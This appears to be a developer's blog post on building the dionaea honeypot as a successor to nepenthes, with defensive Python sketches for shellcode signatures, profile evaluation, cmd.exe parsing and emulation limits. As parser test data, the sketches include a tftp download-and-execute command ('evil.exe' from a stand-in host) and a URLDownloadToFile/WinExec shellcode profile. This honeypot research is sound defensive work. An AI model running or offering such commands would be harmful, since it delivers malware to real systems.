While there has been little development on nepenthes, there has been a lot of activity in dionaea lately.
Dionaea is meant to be a nepenthes successor,
embedding python as a scripting language,
using libemu to detect shellcode,
supporting ipv6 and tls.
Dionaea is the result of all the shortcomings we experienced with nepenthes, and it is therefore meant to supersede nepenthes.
A major problem in nepenthes was the vulnerability modules for port 445: there were just too many exploitable vulnerabilities on the same port. Our approach of not implementing the protocol failed and made it impossible to keep up with exploitation trends.
More and more exploits started using the Windows API to establish a valid CIFS/SMB session with the attacked host before sending the exploit's payload.
As nepenthes does not speak SMB, we did not get the payload: no payload, no sample.
Nepenthes uses pattern matching with perl regular expressions to detect shellcode.
Pattern matching is pretty popular, but it only works if you have a pattern for the shellcode already.
Creating patterns for unknown shellcode is tricky: you need a copy of the shellcode to create a pattern, and finding unknown shellcode in nepenthes output is rather difficult. Even though we created a system where you could describe shellcode patterns in a configuration file, we never received any new shellcode patterns.
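To illustrate why signature matching only catches what it already knows, here is a minimal sketch in Python. The byte pattern and both sample buffers are made up for illustration and are not taken from the nepenthes signature set; nepenthes itself did this from C++, not with Python's `re` module.

```python
import re

# Illustrative signature for a simple XOR decoder stub (hypothetical, not a
# real nepenthes pattern). It captures the payload length and the XOR key.
XOR_DECODER = re.compile(
    rb"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9(?P<size>..)"
    rb"\x80\x34\x0a(?P<key>.)\xe2\xfa\xeb\x05\xe8\xeb\xff\xff\xff",
    re.DOTALL,  # let '.' match every byte value, including 0x0a
)


def match_known_decoder(buffer: bytes):
    """Return (size, key) if the buffer contains the known stub, else None."""
    m = XOR_DECODER.search(buffer)
    if m is None:
        return None
    size = int.from_bytes(m.group("size"), "little")
    key = m.group("key")[0]
    return size, key


# A buffer containing exactly the stub the signature was written for.
known = (
    b"\x90" * 8
    + b"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x7d\x01"
    + b"\x80\x34\x0a\x99\xe2\xfa\xeb\x05\xe8\xeb\xff\xff\xff"
    + b"payload"
)

# The same buffer with two bytes of the stub changed: no pattern, no match.
variant = known.replace(b"\x5a\x4a", b"\x5b\x4b")
```

The first buffer yields the captured size and key, while the slightly altered one is missed entirely, which is the gap emulation-based detection is meant to close.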
In the meantime, we wrote libemu, which can detect shellcode using emulation, automatically, without any interaction.
You provide a buffer, and libemu will try to detect shellcode in it, even unknown shellcode.
While writing libemu, the plan was to integrate it into nepenthes, which turned out to be a nightmare of its own.
Detecting shellcode using libemu's emulation is pretty fast, but getting an idea of what the shellcode would do if run natively is not; it takes its time.
For nepenthes, this shellcode emulation would prevent the software from doing anything else, as the initial idea was not to use threads.
Trying to make nepenthes aware of threads seemed like a good idea, but it turned out not to be: it just did not work, was hard to debug, and was no fun to work with.
Even though we always claimed it was easy to write nepenthes modules/addons, there was very little contribution. I figured most people stick with Niklaus Wirth:
C++ is an insult to the human brain.
Some services, for example https, require TLS encryption, and there was no way to get this done within nepenthes.
Even though nobody uses IPv6, we wanted to give it a shot. Integration within nepenthes might have been possible, but it would have been a lot of work, and there is no malware using IPv6 yet.
Taking the experience with nepenthes, and all the shortcomings, we decided to start over.
I've been playing with libev for a while, and it turned out to be great software, easy to use, providing exactly the feature set I was looking for.
As I did not want to go for C++ again, I was looking for a library providing all the required data structures and types for C. glib is not perfect, but it provides a stable API and is available in all major distributions.
The next thing was embedding a scripting language. I've had experience with embedding lua before, so it was put on the list of possible languages. Same for spidermonkey. I've had little to no experience with embedding python, or python itself, and did not even like the language, but my environment pushed me to give python a shot.
Using cython, embedding python turned out to be a pleasure, and as I've had serious problems with spidermonkey's garbage collector and lua did not provide the required features, python won the embeddable scripting language contest.
For TLS, openssl is widely used, so I decided to go for it too.
For asynchronous dns resolution, there were adns and udns, and I decided to go for udns, as adns still fails with staged cnames and udns had working support for AAAA records to deal with ipv6.
For downloading things via http, I decided to stick with libcurl.
For shellcode detection, we stuck with libemu; we maintain it, so we can adjust it.
For configuration file parsing, we already had liblcfg, so Paul adjusted it to fit our requirements.
The Honeynet Project decided to fund the nepenthes successor during the summer, as a project running parallel to Google Summer of Code.
After providing a project description and milestones, Mark and I were allowed to spend the summer working on dionaea.
Mark's field of action was writing a working smb emulation in python, while I was to write the software itself and the python bindings, so Mark could use them.
In the beginning, Mark used the previously mentioned python embedding test code to work with, until I caught up and he could use the actual software we call dionaea.
Once the required python bindings were written, both of us could work independently of each other. Of course, from time to time we discussed changes which would break the python bindings; then I broke them, and he adjusted the smb emulation to comply with the changes.
Once the basics were working, I started integrating libemu to detect shellcode, using threads. As I had written the api to deal with libemu and had tried to get it working within nepenthes before, there were no surprises.
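The idea of pushing the slow emulation onto a thread so the main loop stays responsive can be sketched as follows. This is not how dionaea does it (its core is C on top of libev); asyncio with a thread pool is swapped in purely for illustration, and `slow_profile` and `heartbeat` are hypothetical stand-ins.

```python
import asyncio
import time
from concurrent.futures import ThreadPoolExecutor


def slow_profile(buffer: bytes) -> int:
    """Stand-in for a slow emulation run (hypothetical, it just sleeps)."""
    time.sleep(0.2)
    return len(buffer)


async def heartbeat(ticks: list) -> None:
    """Stand-in for the other work the event loop has to keep doing."""
    for _ in range(5):
        ticks.append(time.monotonic())
        await asyncio.sleep(0.02)


async def main():
    ticks = []
    loop = asyncio.get_running_loop()
    with ThreadPoolExecutor(max_workers=1) as pool:
        # The blocking call runs in the worker thread while the loop keeps
        # scheduling heartbeat() in the meantime.
        result, _ = await asyncio.gather(
            loop.run_in_executor(pool, slow_profile, b"\x90" * 64),
            heartbeat(ticks),
        )
    return result, len(ticks)
```

Running `asyncio.run(main())` returns the result of the slow call together with the number of heartbeat ticks that were recorded while it was running.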
Next, once shellcode is detected, we needed to do something with it. libemu can create a 'profile' for shellcode, so we needed a way to evaluate the shellcode's profile and act upon it.
The decision was to serialize the shellcode profile to json, and guess what the shellcode would do in python. Even though I got the impression that serializing to python structures could have been a better choice, there have been no drawbacks to using json so far.
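A minimal sketch of what guessing from a json profile could look like. The profile layout used here (a list of api calls with "call" and "args" fields) and the function name `guess_action` are assumptions made for this example, not the format libemu or dionaea actually emit.

```python
import json

# Assumed profile layout: a JSON list of API calls with their arguments.
# The field names ("call", "args") are an assumption for this sketch.
SAMPLE_PROFILE = json.dumps([
    {"call": "LoadLibraryA", "args": ["urlmon"]},
    {"call": "URLDownloadToFile",
     "args": ["", "http://198.51.100.7/x.exe", "x.exe", "0", "0"]},
    {"call": "WinExec", "args": ["x.exe", "0"]},
])


def guess_action(profile_json: str) -> dict:
    """Guess what the shellcode intends to do from its call profile."""
    calls = json.loads(profile_json)
    for entry in calls:
        name = entry["call"]
        args = entry.get("args", [])
        if name == "URLDownloadToFile":
            # In the Windows API, the URL is the second argument.
            return {"action": "download", "url": args[1]}
        if name == "bind":
            return {"action": "bindshell"}
        if name == "connect":
            return {"action": "connectback"}
    return {"action": "unknown"}
```

The first call that reveals an intention decides the guess; a profile without any recognised call is reported as unknown.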
At a given point, we were able
to emulate smb,
detect shellcode in attacks,
create profiles for the detected shellcode,
guess what the shellcode would do,
act upon it.
The next thing was writing a cmd.exe emulation in python, able to parse shell commands, and we needed something to download malware via ftp/tftp.
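As a rough idea of what parsing such shell commands involves, here is a deliberately naive sketch that pulls tftp downloads out of a cmd.exe command line. The function name and the sample command are made up for illustration; a real emulation has to deal with quoting, redirection and much more.

```python
def find_tftp_downloads(cmdline: str) -> list:
    """Extract (host, filename) pairs from 'tftp -i HOST GET FILE' commands."""
    downloads = []
    # cmd.exe chains commands with '&' and '&&'; splitting on '&' covers
    # both, the empty parts produced by '&&' are skipped below.
    for part in cmdline.split("&"):
        words = part.split()
        if not words:
            continue
        # Strip a leading "cmd /c" wrapper if present.
        if (words[0].lower() in ("cmd", "cmd.exe")
                and len(words) > 2 and words[1].lower() == "/c"):
            words = words[2:]
        if words[0].lower() in ("tftp", "tftp.exe"):
            # Drop the binary-mode switch, leaving HOST GET FILE.
            args = [w for w in words[1:] if w.lower() != "-i"]
            if len(args) >= 3 and args[1].lower() == "get":
                downloads.append((args[0], args[2]))
    return downloads
```

For example, `find_tftp_downloads("cmd /c tftp -i 192.0.2.10 GET evil.exe & evil.exe")` yields one download of `evil.exe` from `192.0.2.10`.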
For TFTP, I had a look at tftpy, asked the author for permission to relicense his software for use in a GPL licensed project, and got it.
So we took tftpy and adjusted it to use the exported python api for network io and to comply with python3.
After we've had the core functionality, the python bindings, the smb emulation (python), libemu shellcode detection, libemu shellcode profile serialization, shellcode profile evaluation (python), cmd.exe parsing (python) and something to download via tftp (python), we took a first sensor online, and caught our first sample via tftp with dionaea.
Next, we wanted to be able to download malware distributed using ftp services.
As ftp services embedded in malware do not work with libcurl, we had to write an ftp client which would mimic the behaviour of the windows ftp.exe client.
As I had already picked up the basics of python, I wrote it in python.
We got our first sample download via ftp.
But we've had attacks which we detected without being able to act upon the profile. All of these attacks were multi stage shellcode, where the first stage of the shellcode would connect to the attacker, receive a second stage, and execute the second stage.
The link:// and blink:// protocols you may know from nepenthes are such multistage shellcodes: the first stage connects to the attacker, sends a cookie, and executes the second stage the attacker sends, if the cookie was correct. The second stage would download a file and execute it.
As the emulation profile did not include the second stage, we were unable to act upon it.
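The cookie handshake described above can be sketched over a local socket pair. Everything here is a toy model under stated assumptions: the cookie length, the payload and all function names are invented, and the 'second stage' is just bytes that are received, never executed.

```python
import socket
import threading


def attacker(sock, expected_cookie: bytes, second_stage: bytes) -> None:
    """Toy attacker side: send the second stage only for the right cookie."""
    cookie = sock.recv(len(expected_cookie))
    if cookie == expected_cookie:
        sock.sendall(second_stage)
    sock.close()


def first_stage(sock, cookie: bytes) -> bytes:
    """Toy first stage: send the cookie, then read until the peer closes."""
    sock.sendall(cookie)
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            break
        chunks.append(data)
    return b"".join(chunks)


def demo(sent_cookie: bytes) -> bytes:
    """Run both sides over a local socket pair and return what was received."""
    ours, theirs = socket.socketpair()
    t = threading.Thread(
        target=attacker, args=(theirs, b"\x01\x02\x03\x04", b"STAGE2"))
    t.start()
    try:
        return first_stage(ours, sent_cookie)
    finally:
        t.join()
        ours.close()
```

With the correct cookie, `demo` returns the second stage; with a wrong one the attacker side just closes the connection and nothing is received. Either way, the second stage only exists on the wire, which is why a static profile of the first stage cannot contain it.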
So we had to execute the shellcode within libemu, proxy all required calls to the host operating system, 'let the shellcode do its job', and grab the downloaded file once the shellcode finished. We took several measures to make sure the shellcode can't harm the honeypot software, limiting it by the number of files/sockets used and by file size, as well as by 'steps' and cpu time spent on it.
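Such limits can be pictured as a small budget object that the emulation loop consults on every step and on every proxied call. This is only a sketch under assumptions: the class, its method names and the default limits are invented for illustration and do not reflect the actual dionaea or libemu code.

```python
import time


class BudgetExceeded(Exception):
    """Raised when the emulated shellcode exceeds one of its limits."""


class EmulationBudget:
    """Hypothetical per-shellcode resource budget (all defaults made up)."""

    def __init__(self, max_steps=1_000_000, max_cpu_seconds=5.0,
                 max_sockets=4, max_file_bytes=4 * 1024 * 1024):
        self.max_steps = max_steps
        self.max_cpu_seconds = max_cpu_seconds
        self.max_sockets = max_sockets
        self.max_file_bytes = max_file_bytes
        self.steps = 0
        self.sockets = 0
        self.file_bytes = 0
        # process_time() counts CPU time of the whole process, which is a
        # simplification compared to per-thread accounting.
        self.cpu_start = time.process_time()

    def step(self) -> None:
        """Account for one emulated instruction."""
        self.steps += 1
        if self.steps > self.max_steps:
            raise BudgetExceeded("step limit reached")
        if time.process_time() - self.cpu_start > self.max_cpu_seconds:
            raise BudgetExceeded("cpu time limit reached")

    def open_socket(self) -> None:
        """Account for one socket the shellcode asked for."""
        self.sockets += 1
        if self.sockets > self.max_sockets:
            raise BudgetExceeded("socket limit reached")

    def write_file(self, nbytes: int) -> None:
        """Account for bytes the shellcode wrote to a file."""
        self.file_bytes += nbytes
        if self.file_bytes > self.max_file_bytes:
            raise BudgetExceeded("file size limit reached")
```

The emulation loop would call `step()` once per instruction and the proxied socket and file calls would call `open_socket()` and `write_file()`, aborting the run as soon as `BudgetExceeded` is raised.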
After I noticed that this emulation was really slow, due to libdasm creating strings for every instruction executed, we patched libemu to disable libdasm, and caught our first sample using shellcode emulation.
Lately, we added support for surfnet's surfids. They still host all of our projects, so it was an honorable duty to support their ids. Adding support for reporting to surfids was really convenient: they provided access to their testing system, so I did not have to set up my own and could start getting things done.
I'm really convinced it was a good idea to start over.
Over time, I even started loving python, though it is not perl.
It is fun to work with dionaea, and it gives good results.
The smb emulation layer Mark wrote is great. Georg decided to use it in mwcollect, and I asked Jan from the amun honeypot to have a look, as it gives really good results.
You can use dionaea, even if there is no release package.
Just grab it from svn.
Installation is slightly more complex than installing nepenthes, as you'll have to install some dependencies from source, but keeping an eye on the documentation, everybody should be able to compile and run it.
If you want to contribute or experience problems, hit the nepenthes-devel list.